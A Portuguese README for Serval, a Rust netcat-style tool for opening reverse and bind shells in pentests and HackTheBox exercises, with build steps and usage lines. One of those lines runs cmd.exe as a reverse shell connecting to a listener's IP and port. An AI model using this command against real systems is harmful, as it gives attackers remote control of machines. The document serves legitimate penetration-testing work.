
Um backdoor no estilo Netcat para testes de penetração e exercícios de pentest.
Serval é um binário leve e fácil de usar para gerar shells reversas e bind para pentests ou exercícios de pentest. Serval é multiplataforma e pode ser compilado para Windows 32 e 64 bits e Linux 32 e 64 bits. Nota: Devido à flexibilidade do Rust, pode ser possível compilar para outras plataformas (como ARM), mas não testei para outras plataformas.
Desenvolvi Serval para remover minha dependência do netcat durante desafios do HacktheBox, já que pode ser problemático encontrar binários do netcat para Windows (especialmente com a opção -e) e é ainda mais difícil encontrar um binário de uma fonte confiável.
Baixe o código-fonte do github
git clone https://github.com/tgadola/serval.git && cd serval-master
*Opcional: Edite o arquivo de construção em .cargo/config para reescrever seu caminho de construção.
Compile o binário para sua plataforma atual.
cargo build --release
*Nota: v1.1.0 requer Rust nightly
Você pode compilar para outras plataformas usando
cargo build --release --target <target-triple>
Se você é uma pessoa particularmente confiante, pode baixar os binários pré-construídos aqui.
Por padrão, o Serval irá escutar ou conectar a uma porta e canalizar a entrada e saída padrão para essa conexão. A flag -e irá gerar um processo e canalizar sua entrada e saída padrão através da rede.
Serval escuta em todas as interfaces.
Use a flag -H para ativar os recursos de edição de linha e histórico de comandos!
serval -l 4400 -H
serval.exe <listening ip> <listening port> -q -e cmd.exe
Um grande agradecimento a @kkawakam-transferwise e seu crate Rustyline, que faz literalmente todo o trabalho pesado. Confira Rustyline!
Obrigado aos criadores e contribuidores do Clap! Confira Clap.
Obrigado aos criadores e contribuidores do Anyhow! Confira Anyhow. +1 pelo ótimo nome do crate.
Obrigado a @jaynus por todos os seus conselhos sobre Rust
Apache 2.0. Veja o arquivo de Licença para mais informações.